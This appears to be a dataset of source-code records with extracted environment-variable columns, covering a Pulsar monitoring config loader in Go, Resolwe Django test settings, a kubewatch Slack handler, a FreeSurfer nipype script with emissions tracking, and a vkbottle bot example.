AlertURL string `json:"alertUrl"`
Verbose bool `json:"verbose"`
}
// OpsGenieCfg is opsGenie configuration
type OpsGenieCfg struct {
HeartBeatURL string `json:"heartbeatUrl"`
HeartbeatKey string `json:"heartbeatKey"`
AlertKey string `json:"alertKey"`
IntervalSeconds int `json:"intervalSeconds"`
}
// PagerDutyCfg is the PagerDuty configuration
type PagerDutyCfg struct {
IntegrationKey string `json:"integrationKey"`
}
// AnalyticsCfg is the analytics usage and statistics tracking configuration
type AnalyticsCfg struct {
APIKey string `json:"apiKey"`
IngestionURL string `json:"ingestionUrl"`
InsightsWriteKey string `json:"insightsWriteKey"`
InsightsAccountID string `json:"insightsAccountId"`
}
// SiteCfg configures general website
type SiteCfg struct {
Headers map[string]string `json:"headers"`
URL string `json:"url"`
Name string `json:"name"`
IntervalSeconds int `json:"intervalSeconds"`
ResponseSeconds int `json:"responseSeconds"`
StatusCode int `json:"statusCode"`
StatusCodeExpr string `json:"statusCodeExpr"`
Retries int `json:"retries"`
AlertPolicy AlertPolicyCfg `json:"alertPolicy"`
}
// SitesCfg configures a list of websites
type SitesCfg struct {
Sites []SiteCfg `json:"sites"`
}
// OpsClusterCfg is each cluster's configuration
type OpsClusterCfg struct {
Name string `json:"name"`
URL string `json:"url"`
AlertPolicy AlertPolicyCfg `json:"alertPolicy"`
}
// PulsarAdminRESTCfg is for monitoring a list of Pulsar clusters
type PulsarAdminRESTCfg struct {
Token string `json:"Token"`
Clusters []OpsClusterCfg `json:"clusters"`
IntervalSeconds int `json:"intervalSeconds"`
}
// TopicCfg is topic configuration
type TopicCfg struct {
Name string `json:"name"`
ClusterName string `json:"clusterName"` // used for broker monitoring if specified
Token string `json:"token"`
TrustStore string `json:"trustStore"`
NumberOfPartitions int `json:"numberOfPartitions"`
LatencyBudgetMs int `json:"latencyBudgetMs"`
PulsarURL string `json:"pulsarUrl"`
AdminURL string `json:"adminUrl"`
TopicName string `json:"topicName"`
OutputTopic string `json:"outputTopic"`
IntervalSeconds int `json:"intervalSeconds"`
ExpectedMsg string `json:"expectedMsg"`
PayloadSizes []string `json:"payloadSizes"`
NumOfMessages int `json:"numberOfMessages"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
DowntimeTrackerDisabled bool `json:"downtimeTrackerDisabled"`
}
// WsConfig is the configuration to monitor WebSocket pub/sub latency
type WsConfig struct {
Name string `json:"name"`
Token string `json:"token"`
Cluster string `json:"cluster"` // can be used for alert de-dupe
LatencyBudgetMs int `json:"latencyBudgetMs"`
ProducerURL string `json:"producerUrl"`
ConsumerURL string `json:"consumerUrl"`
TopicName string `json:"topicName"`
IntervalSeconds int `json:"intervalSeconds"`
Scheme string `json:"scheme"`
Port string `json:"port"`
Subscription string `json:"subscription"`
URLQueryParams string `json:"urlQueryParams"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// K8sClusterCfg is the configuration to monitor a Kubernetes cluster;
// only to be enabled for in-cluster monitoring
type K8sClusterCfg struct {
Enabled bool `json:"enabled"`
PulsarNamespace string `json:"pulsarNamespace"`
KubeConfigDir string `json:"kubeConfigDir"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// BrokersCfg monitors all brokers in the cluster
type BrokersCfg struct {
InClusterRESTURL string `json:"inclusterRestURL"`
IntervalSeconds int `json:"intervalSeconds"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// TenantUsageCfg configures tenant usage reporting and monitoring
type TenantUsageCfg struct {
OutBytesLimit uint64 `json:"outBytesLimit"`
AlertIntervalMinutes int `json:"alertIntervalMinutes"`
}
// Configuration - this server's configuration
type Configuration struct {
// Name is the Pulsar cluster name, it is mandatory
Name string `json:"name"`
// ClusterName is the Pulsar cluster name if the Name cannot be used as the Pulsar cluster name, optional
ClusterName string `json:"clusterName"`
// TokenFilePath is the file path to Pulsar JWT. It takes precedence of the token attribute.
TokenFilePath string `json:"tokenFilePath"`
	// Token is a Pulsar JWT that can be used for both the Pulsar client and the HTTP admin client
Token string `json:"token"`
BrokersConfig BrokersCfg `json:"brokersConfig"`
TrustStore string `json:"trustStore"`
K8sConfig K8sClusterCfg `json:"k8sConfig"`
AnalyticsConfig AnalyticsCfg `json:"analyticsConfig"`
PrometheusConfig PrometheusCfg `json:"prometheusConfig"`
SlackConfig SlackCfg `json:"slackConfig"`
OpsGenieConfig OpsGenieCfg `json:"opsGenieConfig"`
PagerDutyConfig PagerDutyCfg `json:"pagerDutyConfig"`
PulsarAdminConfig PulsarAdminRESTCfg `json:"pulsarAdminRestConfig"`
PulsarTopicConfig []TopicCfg `json:"pulsarTopicConfig"`
SitesConfig SitesCfg `json:"sitesConfig"`
WebSocketConfig []WsConfig `json:"webSocketConfig"`
TenantUsageConfig TenantUsageCfg `json:"tenantUsageConfig"`
}
// AlertPolicyCfg is a set of criteria to evaluate triggers for incident alerts
type AlertPolicyCfg struct {
	// First evaluation: the ceiling on continuous failures
Ceiling int `json:"ceiling"`
	// Second evaluation: the failure ceiling within a moving window
MovingWindowSeconds int `json:"movingWindowSeconds"`
CeilingInMovingWindow int `json:"ceilingInMovingWindow"`
}
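// An illustrative (made-up) snippet of this policy in a YAML config file:
// alert after 5 consecutive failures, or after 10 failures within a
// 10-minute moving window.
//
//	alertPolicy:
//	  ceiling: 5
//	  movingWindowSeconds: 600
//	  ceilingInMovingWindow: 10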
// Config - this server's configuration instance
var Config Configuration
// ReadConfigFile reads the configuration file.
func ReadConfigFile(configFile string) {
fileBytes, err := ioutil.ReadFile(configFile)
if err != nil {
log.Errorf("failed to load configuration file %s", configFile)
panic(err)
}
if hasJSONPrefix(fileBytes) {
err = json.Unmarshal(fileBytes, &Config)
if err != nil {
panic(err)
}
} else {
err = yaml.Unmarshal(fileBytes, &Config)
if err != nil {
panic(err)
}
}
if len(Config.Name) < 1 {
panic("a valid `name` in Configuration must be specified")
}
// reconcile the JWT
if len(Config.TokenFilePath) > 1 {
tokenBytes, err := ioutil.ReadFile(Config.TokenFilePath)
if err != nil {
log.Errorf("failed to read Pulsar JWT from a file %s", Config.TokenFilePath)
} else {
log.Infof("read Pulsar token from the file %s", Config.TokenFilePath)
Config.Token = string(tokenBytes)
}
}
Config.Token = strings.TrimSuffix(util.AssignString(Config.Token, os.Getenv("PulsarToken")), "\n")
log.Infof("config %v", Config)
}
var jsonPrefix = []byte("{")
func hasJSONPrefix(buf []byte) bool {
return hasPrefix(buf, jsonPrefix)
}
// hasPrefix returns true if the first non-whitespace bytes in buf are prefix.
func hasPrefix(buf []byte, prefix []byte) bool {
trim := bytes.TrimLeftFunc(buf, unicode.IsSpace)
return bytes.HasPrefix(trim, prefix)
}
// GetConfig returns a reference to the Configuration
func GetConfig() *Configuration {
return &Config
}
// monitorFunc is a periodic monitoring routine.
type monitorFunc func()
// RunInterval runs fn once immediately, then repeatedly at the given interval.
func RunInterval(fn monitorFunc, interval time.Duration) {
go func() {
ticker := time.NewTicker(interval)
defer ticker.Stop()
fn()
		for range ticker.C {
			fn()
		}
}()
}
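// Illustrative usage sketch (not part of the original file): start a probe
// that fires immediately and then every 30 seconds. The probe body is a
// placeholder.
//
//	RunInterval(func() { log.Infof("heartbeat probe") }, 30*time.Second)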
| [
"\"PulsarToken\""
] | [] | [
"PulsarToken"
] | [] | ["PulsarToken"] | go | 1 | 0 | |
tests/settings.py | """
Django settings for running tests for Resolwe package.
"""
import os
import re
from distutils.util import strtobool # pylint: disable=import-error,no-name-in-module
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
SECRET_KEY = 'secret'
# TODO: Remove this setting completely and only set it in the tests that require it.
RESOLWE_HOST_URL = 'https://dummy.host.local'
DEBUG = True
ALLOWED_HOSTS = ['*']
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
'channels',
'rest_framework',
'guardian',
'versionfield',
'resolwe',
'resolwe.permissions',
'resolwe.flow',
'resolwe.elastic',
'resolwe.toolkit',
'resolwe.test_helpers',
'resolwe_bio',
'resolwe_bio.kb',
)
ROOT_URLCONF = 'tests.urls'
TEST_RUNNER = 'resolwe.test_helpers.test_runner.ResolweRunner'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
],
},
},
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
# Check if PostgreSQL settings are set via environment variables
pgname = os.environ.get('RESOLWE_POSTGRESQL_NAME', 'resolwe-bio')
pguser = os.environ.get('RESOLWE_POSTGRESQL_USER', 'resolwe')
pghost = os.environ.get('RESOLWE_POSTGRESQL_HOST', 'localhost')
pgport = int(os.environ.get('RESOLWE_POSTGRESQL_PORT', 55433))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': pgname,
'USER': pguser,
'HOST': pghost,
'PORT': pgport,
}
}
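# Illustrative: the environment variables consumed above (placeholder
# values, not real credentials):
#
#   export RESOLWE_POSTGRESQL_NAME=resolwe-bio
#   export RESOLWE_POSTGRESQL_USER=resolwe
#   export RESOLWE_POSTGRESQL_HOST=localhost
#   export RESOLWE_POSTGRESQL_PORT=55433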
STATIC_URL = '/static/'
REDIS_CONNECTION = {
'host': 'localhost',
'port': int(os.environ.get('RESOLWE_REDIS_PORT', 56380)),
'db': int(os.environ.get('RESOLWE_REDIS_DATABASE', 0)),
}
FLOW_EXECUTOR = {
'NAME': 'resolwe.flow.executors.docker',
    # XXX: Change to a stable resolwe image once it includes all the required tools
'CONTAINER_IMAGE': 'resolwe/bio-linux8-resolwe-preview',
'CONTAINER_NAME_PREFIX': 'resolwebio',
'REDIS_CONNECTION': REDIS_CONNECTION,
'DATA_DIR': os.path.join(PROJECT_ROOT, 'test_data'),
'UPLOAD_DIR': os.path.join(PROJECT_ROOT, 'test_upload'),
'RUNTIME_DIR': os.path.join(PROJECT_ROOT, 'test_runtime'),
}
# Set custom executor command if set via environment variable
if 'RESOLWE_DOCKER_COMMAND' in os.environ:
FLOW_DOCKER_COMMAND = os.environ['RESOLWE_DOCKER_COMMAND']
FLOW_API = {
'PERMISSIONS': 'resolwe.permissions.permissions',
}
FLOW_EXPRESSION_ENGINES = [
{
'ENGINE': 'resolwe.flow.expression_engines.jinja',
'CUSTOM_FILTERS': [
'resolwe_bio.expression_filters.sample',
'resolwe_bio.expression_filters.relation',
]
},
]
FLOW_EXECUTION_ENGINES = [
'resolwe.flow.execution_engines.bash',
'resolwe.flow.execution_engines.workflow',
'resolwe.flow.execution_engines.python',
]
# Check if any Manager settings are set via environment variables
manager_prefix = os.environ.get('RESOLWE_MANAGER_REDIS_PREFIX', 'resolwe-bio.manager')
# Ensure Manager channel prefix is a valid Django Channels name.
manager_prefix = re.sub('[^0-9a-zA-Z.-]', '-', manager_prefix)
FLOW_MANAGER = {
'NAME': 'resolwe.flow.managers.workload_connectors.local',
'REDIS_PREFIX': manager_prefix,
'REDIS_CONNECTION': REDIS_CONNECTION,
}
FLOW_DOCKER_VOLUME_EXTRA_OPTIONS = {
'data': 'Z',
'data_all': 'z',
'upload': 'z',
'secrets': 'Z',
'users': 'Z',
'tools': 'z',
'runtime': 'Z',
}
FLOW_PROCESS_MAX_CORES = 1
# Don't pull Docker images if set via the environment variable.
FLOW_DOCKER_DONT_PULL = strtobool(os.environ.get('RESOLWE_DOCKER_DONT_PULL', '0'))
# Disable SECCOMP if set via environment variable.
FLOW_DOCKER_DISABLE_SECCOMP = strtobool(os.environ.get('RESOLWE_DOCKER_DISABLE_SECCOMP', '0'))
# Ensure all container images follow a specific format.
FLOW_CONTAINER_VALIDATE_IMAGE = r'.+:(?!latest)'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_FILTER_BACKENDS': (
'resolwe.permissions.filters.ResolwePermissionsFilter',
'django_filters.rest_framework.backends.DjangoFilterBackend',
),
# Python<3.7 cannot parse iso-8601 formatted datetimes with tz-info form
# "+01:00" (DRF default). It can only parse "+0100" form, so we need to
# modify this setting. This will be fixed in Python3.7, where "+01:00" can
# be parsed by ``datetime.datetime.strptime`` syntax.
# For more, check "%z" syntax description in:
# https://docs.python.org/3.7/library/datetime.html#strftime-and-strptime-behavior
'DATETIME_FORMAT': '%Y-%m-%dT%H:%M:%S.%f%z'
}
# Time
USE_TZ = True
TIME_ZONE = 'UTC'
# Django does not support parsing of 'iso-8601' formatted datetimes by default.
# Since Django-filters uses Django forms for parsing, we need to modify Django
# setting ``DATETIME_INPUT_FORMATS`` to support 'iso-8601' format.
# https://docs.djangoproject.com/en/1.11/ref/settings/#datetime-input-formats
DATETIME_INPUT_FORMATS = (
# These are already given Django defaults:
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
# These are iso-8601 formatted:
'%Y-%m-%dT%H:%M:%S.%f%z', # '2006-10-25T14:30:59.000200+0200' or '2006-10-25T14:30:59.000200+02:00' (Python>=3.7)
'%Y-%m-%dT%H:%M:%S.%fZ', # '2006-10-25T14:30:59.000200Z'
'%Y-%m-%dT%H:%M:%S.%f', # '2006-10-25T14:30:59.000200'
'%Y-%m-%dT%H:%M:%SZ', # '2006-10-25T14:30:59Z'
'%Y-%m-%dT%H:%M:%S', # '2006-10-25T14:30:59'
'%Y-%m-%dT%H:%M', # '2006-10-25T14:30'
)
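# Illustrative check of the iso-8601 formats above (not part of the settings
# module):
#
#   >>> from datetime import datetime
#   >>> datetime.strptime('2006-10-25T14:30:59.000200+0200',
#   ...                   '%Y-%m-%dT%H:%M:%S.%f%z').utcoffset()
#   # -> a timedelta of +2 hours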
FLOW_PROCESSES_FINDERS = (
'resolwe.flow.finders.FileSystemProcessesFinder',
'resolwe.flow.finders.AppDirectoriesFinder',
)
FLOW_PROCESSES_DIRS = (os.path.join(PROJECT_ROOT, '../resolwe_bio/processes/'),)
# Do not skip tests that fail on Docker executor if this is set via environment
# variable
if os.environ.get('RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES', '').lower() in ["no", "false"]:
TESTS_SKIP_DOCKER_FAILURES = False
# Elastic Search.
ELASTICSEARCH_HOST = os.environ.get('RESOLWE_ES_HOST', 'localhost')
ELASTICSEARCH_PORT = int(os.environ.get('RESOLWE_ES_PORT', '59201'))
# Testing.
TEST_RUNNER = 'resolwe.test_helpers.test_runner.ResolweRunner'
TEST_PROCESS_REQUIRE_TAGS = True
# Don't profile unless set via the environment variable.
TEST_PROCESS_PROFILE = strtobool(os.environ.get('RESOLWE_TEST_PROCESS_PROFILE', '0'))
# Channels.
ASGI_APPLICATION = 'tests.routing.channel_routing'
CHANNEL_LAYERS = {
'default': {
'BACKEND': 'channels_redis.core.RedisChannelLayer',
'CONFIG': {
'hosts': [(REDIS_CONNECTION['host'], REDIS_CONNECTION['port'])],
'expiry': 3600,
},
},
}
# Logging.
# Set the RESOLWEBIO_LOG_FILE environment variable to a file path to enable
# logging debug messages to a file.
log_file_path = os.environ.get('RESOLWEBIO_LOG_FILE', os.devnull) # pylint: disable=invalid-name
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s - %(levelname)s - %(name)s[%(process)s]: %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'WARNING',
'formatter': 'standard',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': log_file_path,
'formatter': 'standard',
'maxBytes': 1024 * 1024 * 10, # 10 MB
},
},
'loggers': {
'': {
'handlers': ['file'],
'level': 'DEBUG',
},
'elasticsearch': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': False,
},
'urllib3': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': False,
},
}
}
| [] | [] | [
"RESOLWEBIO_LOG_FILE",
"RESOLWE_POSTGRESQL_NAME",
"RESOLWE_DOCKER_COMMAND",
"RESOLWE_ES_HOST",
"RESOLWE_POSTGRESQL_PORT",
"RESOLWE_ES_PORT",
"RESOLWE_MANAGER_REDIS_PREFIX",
"RESOLWE_DOCKER_DONT_PULL",
"RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES",
"RESOLWE_REDIS_PORT",
"RESOLWE_POSTGRESQL_USER",
"RESOLWE_POSTGRESQL_HOST",
"RESOLWE_TEST_PROCESS_PROFILE",
"RESOLWE_DOCKER_DISABLE_SECCOMP",
"RESOLWE_REDIS_DATABASE"
] | [] | ["RESOLWEBIO_LOG_FILE", "RESOLWE_POSTGRESQL_NAME", "RESOLWE_DOCKER_COMMAND", "RESOLWE_ES_HOST", "RESOLWE_POSTGRESQL_PORT", "RESOLWE_ES_PORT", "RESOLWE_MANAGER_REDIS_PREFIX", "RESOLWE_DOCKER_DONT_PULL", "RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES", "RESOLWE_REDIS_PORT", "RESOLWE_POSTGRESQL_USER", "RESOLWE_POSTGRESQL_HOST", "RESOLWE_TEST_PROCESS_PROFILE", "RESOLWE_DOCKER_DISABLE_SECCOMP", "RESOLWE_REDIS_DATABASE"] | python | 15 | 0 | |
pkg/handlers/slack/slack.go | /*
Copyright 2016 Skippbox, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package slack
import (
"fmt"
"log"
"os"
"github.com/nlopes/slack"
"github.com/skippbox/kubewatch/config"
"github.com/skippbox/kubewatch/pkg/event"
kbEvent "github.com/skippbox/kubewatch/pkg/event"
)
var slackColors = map[string]string{
"Normal": "good",
"Warning": "warning",
"Danger": "danger",
}
var slackErrMsg = `
%s
You need to set both slack token and channel for slack notify,
using "--token/-t" and "--channel/-c", or using environment variables:
export KW_SLACK_TOKEN=slack_token
export KW_SLACK_CHANNEL=slack_channel
Command line flags will override environment variables
`
// Slack handler implements the handler.Handler interface;
// it notifies events to a Slack channel
type Slack struct {
Token string
Channel string
}
// Init prepares slack configuration
func (s *Slack) Init(c *config.Config) error {
token := c.Handler.Slack.Token
channel := c.Handler.Slack.Channel
if token == "" {
token = os.Getenv("KW_SLACK_TOKEN")
}
if channel == "" {
channel = os.Getenv("KW_SLACK_CHANNEL")
}
s.Token = token
s.Channel = channel
return checkMissingSlackVars(s)
}
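// Illustrative sketch (not in the original file): initialising the handler
// purely from environment variables, matching slackErrMsg above. The token
// value is a placeholder.
//
//	os.Setenv("KW_SLACK_TOKEN", "xoxb-placeholder")
//	os.Setenv("KW_SLACK_CHANNEL", "#ops")
//	s := &Slack{}
//	err := s.Init(&config.Config{})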
func (s *Slack) ObjectCreated(obj interface{}) {
notifySlack(s, obj, "created")
}
func (s *Slack) ObjectDeleted(obj interface{}) {
notifySlack(s, obj, "deleted")
}
func (s *Slack) ObjectUpdated(oldObj, newObj interface{}) {
notifySlack(s, newObj, "updated")
}
func notifySlack(s *Slack, obj interface{}, action string) {
e := kbEvent.New(obj, action)
api := slack.New(s.Token)
params := slack.PostMessageParameters{}
attachment := prepareSlackAttachment(e)
params.Attachments = []slack.Attachment{attachment}
params.AsUser = true
channelID, timestamp, err := api.PostMessage(s.Channel, "", params)
if err != nil {
log.Printf("%s\n", err)
return
}
log.Printf("Message successfully sent to channel %s at %s", channelID, timestamp)
}
func checkMissingSlackVars(s *Slack) error {
if s.Token == "" || s.Channel == "" {
return fmt.Errorf(slackErrMsg, "Missing slack token or channel")
}
return nil
}
func prepareSlackAttachment(e event.Event) slack.Attachment {
msg := fmt.Sprintf(
"A %s in namespace %s has been %s: %s",
e.Kind,
e.Namespace,
e.Reason,
e.Name,
)
attachment := slack.Attachment{
Fields: []slack.AttachmentField{
slack.AttachmentField{
Title: "kubewatch",
Value: msg,
},
},
}
if color, ok := slackColors[e.Status]; ok {
attachment.Color = color
}
attachment.MarkdownIn = []string{"fields"}
return attachment
}
| [
"\"KW_SLACK_TOKEN\"",
"\"KW_SLACK_CHANNEL\""
] | [] | [
"KW_SLACK_CHANNEL",
"KW_SLACK_TOKEN"
] | [] | ["KW_SLACK_CHANNEL", "KW_SLACK_TOKEN"] | go | 2 | 0 | |
example/src/dogs/dog-1.go | package dogs
// Snickers returns a greeting from Brooklyn.
func Snickers() string {
return "Brooklyn Says Hi!"
} | [] | [] | [] | [] | [] | go | null | null | null |
run_scripts/FreeSurfer/nipype_reconall_with_tracker.py | # Import modules
import os
import sys
from os.path import join as opj
import pandas as pd
import time
from nipype.interfaces.freesurfer import ReconAll
from nipype.interfaces.utility import IdentityInterface
from nipype.pipeline.engine import Workflow, Node
from pypapi import events, papi_high as high
import argparse
# Add paths (singularity should see these)
# FastSurfer and carbon trackers are in the mounted dir as these repos keep getting updated.
# TODO replace this with setup.py once the dependencies become stable
# sys.path.append('../../../experiment-impact-tracker/')
# sys.path.append('../../../codecarbon/')
from experiment_impact_tracker.compute_tracker import ImpactTracker
from codecarbon import EmissionsTracker, OfflineEmissionsTracker
def get_reconall(recon_directive,fs_folder):
# This node represents the actual recon-all command
reconall = Node(ReconAll(directive=recon_directive,
flags='-nuintensitycor -3T',
subjects_dir=fs_folder),
name="reconall")
return reconall
# This function returns for each subject the path to struct.nii.gz
def pathfinder(subject, foldername, filename):
from os.path import join as opj
struct_path = opj(foldername, subject, filename)
return struct_path
def main():
# setup
exp_start_time = time.time()
# argparse
parser = argparse.ArgumentParser(description='Script to run freesurfer reconall with nipype and track compute costs', epilog='$Id: fast_surfer_cnn, v 1.0 2019/09/30$')
# Data
parser.add_argument('--experiment_dir', dest='experiment_dir', help='path to directory to store freesurfer derived data.')
parser.add_argument('--data_dir', help="path to input data", default='/neurohub/ukbb/imaging/')
parser.add_argument('--subject_id', dest='subject_id', help='subject_id')
parser.add_argument('--T1_identifier', help='T1 identifier string relateive to the subject directory')
# FreeSurfer
parser.add_argument('--recon_directive', dest='recon_directive', help='recon_directive (autorecon 1, 2, or 3)', default='1') #MTL
# Trackers
parser.add_argument('--tracker_log_dir', dest='tracker_log_dir',
help="log dir for experiment impact tracker",
type=str, default='./tracker_logs/')
parser.add_argument('--geo_loc', dest='geo_loc',
help="(lat,log) coords for experiment impact tracker",
type=str, default='45.4972159,-73.6103642') #MTL Beluga
parser.add_argument('--CC_offline',
help="Run CC in offline mode",
action='store_true')
parser.add_argument('--TZ', dest='TZ',
help="TimeZone",
type=str, default='America/New_York')
parser.add_argument('--iso_code', dest='iso_code',
help="Country ISO code",
type=str, default='USA')
# PAPI
parser.add_argument('--count_FLOPs', dest='count_FLOPs',help="Count FLOPs using PAPI",action='store_true')
args = parser.parse_args()
# Data
experiment_dir = args.experiment_dir
data_dir = args.data_dir
subject_id = args.subject_id
T1_identifier = args.T1_identifier
# FreeSurfer
recon_directive = args.recon_directive
# FLOPs
count_FLOPs = args.count_FLOPs
# Trackers
tracker_log_dir = args.tracker_log_dir
geo_loc = args.geo_loc
CC_offline = args.CC_offline
TZ = args.TZ
iso_code = args.iso_code
print(f'Using offline mode for CC tracker: {CC_offline}')
if CC_offline:
print(f'Using {TZ} timezone and {iso_code} country iso code')
print(f'Starting subject: {subject_id}')
# Set up the trackers
log_dir = '{}/{}/'.format(tracker_log_dir,subject_id)
log_dir_EIT = f'{log_dir}/EIT/'
log_dir_CC = f'{log_dir}/CC/'
for d in [log_dir_EIT,log_dir_CC]:
if not os.path.exists(d):
os.makedirs(d)
# Use specified geo location for the HPC
ly,lx = float(geo_loc.split(',')[0]), float(geo_loc.split(',')[1])
coords = (ly,lx)
    print(f'Using geographical coordinates (lat,long): {coords}')
# EIT tracker
tracker_EIT = ImpactTracker(log_dir_EIT,coords)
tracker_EIT.launch_impact_monitor()
# CodeCarbon tracker
    os.environ['TZ'] = TZ
if CC_offline:
tracker_CC = OfflineEmissionsTracker(output_dir=log_dir_CC, country_iso_code=iso_code)
else:
tracker_CC = EmissionsTracker(output_dir=log_dir_CC)
tracker_CC.start()
if count_FLOPs:
print('Counting flops using PAPI')
flop_csv = tracker_log_dir + 'compute_costs_flop.csv'
flop_df = pd.DataFrame(columns=['task','start_time','duration','DP'])
# Start FS processing for a given subject
subject_list = [subject_id]
fs_folder = opj(experiment_dir, 'freesurfer') # location of freesurfer folder
# Create the output folder - FreeSurfer can only run if this folder exists
os.system('mkdir -p %s' % fs_folder)
# Specify recon workflow stages
if recon_directive == 'all':
recon_directives = ['autorecon1','autorecon2','autorecon3']
else:
recon_directives = [recon_directive]
for r, recon_directive in enumerate(recon_directives):
print('\nStarting stage: {}'.format(recon_directive))
# Create the pipeline that runs the recon-all command
reconflow = Workflow(name="reconflow")
reconflow.base_dir = opj(experiment_dir, 'workingdir_reconflow')
# Some magical stuff happens here (not important for now)
infosource = Node(IdentityInterface(fields=['subject_id']), name="infosource")
infosource.iterables = ('subject_id', subject_list)
# Specify recon-all stage based on recon-directive
reconall = get_reconall(recon_directive, fs_folder)
# This section connects all the nodes of the pipeline to each other
reconflow.connect([(infosource, reconall, [('subject_id', 'subject_id')]),
(infosource, reconall, [(('subject_id', pathfinder,
data_dir, T1_identifier),
'T1_files')]),
])
if count_FLOPs:
# start flop counter
start_time = time.time()
high.start_counters([events.PAPI_DP_OPS,]) #default: PAPI_FP_OPS
# This command runs the recon-all pipeline in parallel (using n_procs cores)
# reconflow.run('MultiProc', plugin_args={'n_procs': 4})
reconflow.run()
if count_FLOPs:
# stop flop counter
DP = high.stop_counters()[0]
end_time = time.time()
duration = end_time - start_time
print('Duration: {}, Flops: {}'.format(duration, DP))
flop_df.loc[r] = [recon_directive,start_time, duration, DP]
## code-carbon tracker
tracker_CC.stop()
if count_FLOPs:
flop_df.to_csv(flop_csv)
if __name__=='__main__':
main()
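# Example invocation (illustrative; the paths and subject ID below are
# hypothetical placeholders):
#
#   python nipype_reconall_with_tracker.py \
#       --experiment_dir /scratch/fs_out \
#       --data_dir /neurohub/ukbb/imaging/ \
#       --subject_id sub-0001 \
#       --T1_identifier anat/T1w.nii.gz \
#       --recon_directive all \
#       --CC_offline --count_FLOPs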
| [] | [] | [
"TZ"
] | [] | ["TZ"] | python | 1 | 0 | |
examples/high-level/labeler_setup.py | import os
from typing import List
from vkbottle import ABCRule, BaseStateGroup, VKAPIError
from vkbottle.bot import Bot, BotLabeler, Message
# A simple rule to demonstrate labeler
# setup for custom rules later
class SpamRule(ABCRule):
def __init__(self, chars: List[str]):
self.chars = "".join(chars)
async def check(self, message: Message):
return len(message.text) and message.text.strip(self.chars) == ""
# Create a bot, or a single labeler:
# from vkbottle.bot import BotLabeler
# labeler = BotLabeler()
bot = Bot(os.environ["token"])
# Labeler can be accessed with bot.labeler
# or with bot.on (.on is property which returns
# .labeler, this shortcut is cute legacy from
# vkbottle 2.x
# This is the first shortcut for VBMLRule from custom_rules
# <vbml_ignore_case = True> makes get_vbml_rule add
# re.IGNORECASE to the flags
bot.labeler.vbml_ignore_case = True
# You can add default flags if ignore case is False
# <bot.labeler.default_flags = ...>
# We can add a rule to custom_rules and it will be accessible
# in handlers anywhere, but note that a labeler is always
# local (shortcuts work only for a local instance,
# e.g. Bot, Blueprint, or a pure Labeler)
bot.labeler.custom_rules["spam"] = SpamRule
# BotLabeler has fixed views. If you want to add yours you need
# to implement a custom labeler; take into account that labeler
# views are GLOBAL(!)
bot.labeler.views() # {"message": MessageView, "raw": RawEventView}
bot.labeler.load(BotLabeler()) # Labeler can be loaded in another labeler
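# Illustrative sketch: rules and handlers registered on a separate labeler
# become available once it is loaded (the module below is hypothetical):
#
#   from my_handlers import labeler as feature_labeler
#   bot.labeler.load(feature_labeler)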
# Patcher for vbml rule shortcut can be set:
# <bot.labeler.patcher = ...>
# We will add some states
# The comments for the states are skipped because states
# are not the topic of this example
class SpamState(BaseStateGroup):
GOOD = 1
BAD = 2
# Let's add some handlers
@bot.on.chat_message(spam=["!", ".", "?", "$", "#", "@", "%"])
async def spam_handler(message: Message):
state_peer = await bot.state_dispenser.get(message.from_id)
if state_peer and state_peer.state == SpamState.BAD:
try:
await bot.api.messages.remove_chat_user(message.peer_id - 2e9, message.from_id)
return "Как можно игнорировать мои просьбы"
except VKAPIError(15):
return "Где мои права администратора?"
await message.answer("Пожалуйста перестаньте спамить")
await bot.state_dispenser.set(message.from_id, SpamState.BAD)
@bot.on.message(text="прости меня")
async def forgive_handler(message: Message):
await bot.state_dispenser.set(message.from_id, SpamState.GOOD)
return "Ладно, извинения приняты"
bot.run_forever()
| [] | [] | [
"token"
] | [] | ["token"] | python | 1 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
